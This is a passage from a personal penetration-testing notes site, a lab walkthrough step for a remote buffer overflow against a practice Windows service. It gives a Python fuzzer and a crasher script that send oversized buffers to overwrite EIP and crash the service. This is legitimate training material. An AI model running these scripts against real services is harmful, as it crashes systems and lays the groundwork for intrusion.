LogoLogo
  • 🤩Welcome!
  • Buffer overflow
    • Remote Buffer Overflow
      • Crashing the Application
      • Controlling the EIP
      • Finding Bad Characters
      • Finding a Return Address
      • Generating Shellcode
      • Getting a Shell
  • Wireless Penetration Testing
    • Wifi Pineapple - Tetra
      • Setup
      • Firmware Upgrade
      • Capturing Wireless Handshake
      • Cracking WPA2 Handshake
      • PineAP
      • Modules
  • PortSwigger Labs
    • Authentication
      • Username enumeration via different responses
      • Username enumeration via subtly different responses
      • Username enumeration via response timing
  • TryHackMe
    • 🎄Advent of Cyber 3 (2021)
      • [Day 1] Save The Gifts
      • [Day 2] Elf HR Problems
      • [Day 3] Christmas Blackout
      • [Day 4] Santa's Running Behind
      • [Day 5] Pesky Elf Forum
      • [Day 6] Patch Management Is Hard
      • [Day 7] Migration Without Security
      • [Day 8] Santa's Bag of Toys
      • [Day 9] Where Is All This Data Going
  • Google Cloud Computing
    • ☁️Cloud Computing Fundamentals
      • Getting Started with Cloud Shell and gcloud
      • Creating a Virtual Machine
      • App Engine: Qwik Start - Python
      • Cloud Functions: Qwik Start - Command Line
      • Kubernetes Engine: Qwik Start
      • Set Up Network and HTTP Load Balancers
Powered by GitBook
On this page
  • Fuzzing the Application
  • Fuzzer.py
  • Fuzzing
  • Crashing the Application
  • Crasher.py
  • Crashing

Was this helpful?

  1. Buffer overflow
  2. Remote Buffer Overflow

Crashing the Application

In order to exploit the target application, we need to crash the application and be able to overwrite the EIP with our own values.

Fuzzing the Application

This step can be skipped for some applications as we already know the buffer size that causes the crash.

Fuzzer.py

#!/usr/bin/env python3

import socket, time, sys

ip = "windows.box"

port = 1337
timeout = 5
prefix = "OVERFLOW10 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Fuzzing

python3 fuzzer.py

The fuzzer tells us that the program crashed when600 byteswas sent in as the buffer size. We also notice that the EIP has been overwritten with \x41.

Crashing the Application

This step can be used to verify the value from the fuzzing process.

Crasher.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    buffer = prefix + "A" * 600

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Crashing

python crasher.py

Once Crasher.py is ran, notice that the target application crashes and the EIP is overwritten with \x41. This confirms that 600 bytes is indeed the buffer size that causes the target application to crash.

PreviousRemote Buffer OverflowNextControlling the EIP

Last updated 3 years ago

Was this helpful?